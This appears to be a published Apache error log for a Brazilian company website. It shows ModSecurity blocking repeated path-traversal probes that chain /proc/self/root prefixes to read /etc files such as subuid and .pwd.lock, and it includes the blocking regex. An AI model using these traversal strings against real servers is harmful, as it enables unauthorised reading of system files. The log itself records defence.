"bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXldY0UrI5A3LftIwCTgAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:04:10.636755 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.241.31:35054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXmaBJNF7axNlVR0Ud7AAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:04:12.169777 2026] [proxy_fcgi:error] [pid 18380:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:55428] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:04:15.512761 2026] [:error] [pid 2598:tid 140411641214720] [client 216.73.216.191:33701] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXnxj0p0SRWAqcjGF_RwAAAww"]
[Tue Mar 17 15:04:17.127537 2026] [:error] [pid 6296:tid 140411574073088] [client 74.7.241.31:35066] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXoXIk7brgkOH-rIWRYQAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:04:21.205580 2026] [:error] [pid 2473:tid 140411607643904] [client 74.7.241.31:48290] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXpaBJNF7axNlVR0Ud-wAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:04:30.044923 2026] [:error] [pid 9299:tid 140411683178240] [client 216.73.216.191:10412] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXrr-sgTmmJoPuMdy8LQAAAsc"]
[Tue Mar 17 15:04:33.055059 2026] [:error] [pid 29151:tid 140411607643904] [client 216.73.216.191:38420] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXsfPqhzTj3BvfDX-NqQAAAdA"]
[Tue Mar 17 15:04:36.323031 2026] [:error] [pid 2598:tid 140411557287680] [client 216.73.216.191:21416] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXtBj0p0SRWAqcjGF_SQAAAxY"]
[Tue Mar 17 15:04:36.676845 2026] [:error] [pid 9299:tid 140411725141760] [client 216.73.216.191:19807] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXtL-sgTmmJoPuMdy8MwAAAsI"]
[Tue Mar 17 15:04:37.933795 2026] [proxy_fcgi:error] [pid 7004:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56138] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:04:58.631783 2026] [:error] [pid 6296:tid 140411674785536] [client 216.73.216.191:48660] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXynIk7brgkOH-rIWRhgAAAUg"]
[Tue Mar 17 15:04:58.674879 2026] [:error] [pid 29151:tid 140411741927168] [client 74.7.241.31:48296] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXyvPqhzTj3BvfDX-NxAAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:05:00.065944 2026] [proxy_fcgi:error] [pid 17965:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56816] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:05:00.411000 2026] [:error] [pid 2473:tid 140411674785536] [client 216.73.216.191:32622] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXzKBJNF7axNlVR0UeDQAAAAg"]
[Tue Mar 17 15:05:22.128494 2026] [proxy_fcgi:error] [pid 7437:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:57438] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:05:23.575100 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.241.31:40218] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmX46BJNF7axNlVR0UeIwAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:05:44.121775 2026] [proxy_fcgi:error] [pid 2473:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58056] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:05:45.788206 2026] [:error] [pid 19507:tid 140411674785536] [client 216.73.216.191:9766] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmX-dY0UrI5A3LftIwCpAAAAYg"]
[Tue Mar 17 15:05:51.213696 2026] [:error] [pid 2473:tid 140411666392832] [client 216.73.216.191:9477] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmX_6BJNF7axNlVR0UeMgAAAAk"]
[Tue Mar 17 15:05:57.615328 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.243.128:34214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmYBXIk7brgkOH-rIWRrwAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:06:03.139207 2026] [:error] [pid 7004:tid 140411716749056] [client 216.73.216.191:44312] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmYC8U6Sx0TG1YjmQi0-QAAAoM"]
[Tue Mar 17 15:06:03.848569 2026] [:error] [pid 7004:tid 140411699963648] [client 74.7.241.31:43416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmYC8U6Sx0TG1YjmQi0-gAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:06:08.373790 2026] [proxy_fcgi:error] [pid 17965:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:58666] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:06:10.270598 2026] [:error] [pid 29151:tid 140411582465792] [client 74.7.241.31:40678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmYEvPqhzTj3BvfDX-N8wAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:06:14.802290 2026] [:error] [pid 9299:tid 140411548894976] [client 74.7.241.31:40688] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmYFr-sgTmmJoPuMdy8WgAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:06:24.203884 2026] [:error] [pid 29151:tid 140411699963648] [client 216.73.216.191:31606] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmYIPPqhzTj3BvfDX-N_gAAAcU"]
[Tue Mar 17 15:06:25.107348 2026] [:error] [pid 2598:tid 140411607643904] [client 216.73.216.191:40256] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmYIRj0p0SRWAqcjGF_iwAAAxA"]
[Tue Mar 17 15:06:28.803822 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.241.31:49410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmYJNY0UrI5A3LftIwCwQAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:06:32.205988 2026] [proxy_fcgi:error] [pid 18380:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:59322] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:06:41.807315 2026] [:error] [pid 19507:tid 140411716749056] [client 216.73.216.191:41970] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmYMdY0UrI5A3LftIwC1gAAAYM"]
[Tue Mar 17 15:06:43.063221 2026] [core:alert] [pid 19507:tid 140411582465792] [client 74.7.241.31:52448] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var
[Tue Mar 17 15:06:54.125863 2026] [proxy_fcgi:error] [pid 2598:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59980] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:07:16.573810 2026] [proxy_fcgi:error] [pid 9299:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60714] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:07:30.310208 2026] [core:alert] [pid 2473:tid 140411699963648] [client 74.7.243.128:36494] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
